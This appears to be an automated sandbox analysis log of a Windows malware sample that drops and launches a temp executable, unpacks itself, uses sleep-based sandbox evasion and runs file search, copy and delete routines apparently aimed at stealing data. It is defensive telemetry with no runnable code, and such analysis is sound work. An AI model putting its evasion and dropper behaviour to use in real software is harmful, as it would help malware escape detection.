Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7860
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

File created: C:\Users\user\AppData\Local\Temp\1D71.tmp

Jump to behavior

Source: SEejSLAS9f.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SEejSLAS9f.exe	ReversingLabs: Detection: 42%
Source: SEejSLAS9f.exe	Virustotal: Detection: 38%

Source: unknown	Process created: C:\Users\user\Desktop\SEejSLAS9f.exe "C:\Users\user\Desktop\SEejSLAS9f.exe"
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Process created: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe "C:\Users\user\AppData\Local\Temp\1D71.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 1296
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Process created: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe "C:\Users\user\AppData\Local\Temp\1D71.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Unpacked PE file: 1.2.1D71.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Unpacked PE file: 0.2.SEejSLAS9f.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Unpacked PE file: 1.2.1D71.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0043DB77 push dword ptr [esp+ecx-75h]; iretd	0_2_0043DB7B
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_008E11BD push 00000003h; ret	0_2_008E11C1
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_008DF412 push es; iretd	0_2_008DF423
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_008E37CA pushad ; ret	0_2_008E37E6
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_008DD91C pushad ; retf	0_2_008DD91D
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_008E3948 push ecx; ret	0_2_008E3965
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_008E0D1C pushad ; ret	0_2_008E0D44
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_024809CD push ecx; ret	0_2_024809E0
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_024A799F push esp; retf	0_2_024A79A7
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0248CE18 push ss; retf	0_2_0248CE1D
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0247FFF3 push ecx; ret	0_2_02480006
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_024A7F9D push esp; retf	0_2_024A7F9E
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_024A9DE8 pushad ; retf	0_2_024A9DEF
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_009ED88C pushad ; retf	1_2_009ED88D
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_009F20F6 push ebp; iretd	1_2_009F2129
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_009F11EF push B35707CFh; iretd	1_2_009F12E3
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_009F11EF pushad ; iretd	1_2_009F1361
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_009F2BED push edx; iretd	1_2_009F2BFE
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_009F12E4 pushad ; iretd	1_2_009F1361
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_009EF250 push ebx; ret	1_2_009EF2B5
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_009F0270 push 00000032h; retf	1_2_009F0272
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02497B2C push ecx; ret	1_2_02497B3F

Source: SEejSLAS9f.exe	Static PE information: section name: .text entropy: 7.554746178588047
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.112133434971041
Source: 1D71.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.112133434971041

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe			Jump to dropped file
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	File created: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe			Jump to dropped file

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Window / User API: threadDelayed 540			Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Window / User API: threadDelayed 9441			Jump to behavior

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-64241
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Evasive API call chain: GetSystemTime,DecisionNodes			graph_1-32666

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	API coverage: 5.2 %
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	API coverage: 3.8 %

Source: C:\Users\user\Desktop\SEejSLAS9f.exe TID: 7820	Thread sleep count: 540 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe TID: 7820	Thread sleep time: -389880s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe TID: 7820	Thread sleep count: 9441 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SEejSLAS9f.exe TID: 7820	Thread sleep time: -6816402s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02481EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_02481EA7
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0248CF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_0248CF47
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02483F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_02483F27
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0247DFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_0247DFD7
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02471807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_02471807
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02471820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_02471820
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02481827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_02481827
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0248D8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_0248D8A7
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0248E0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	1_2_0248E0B7
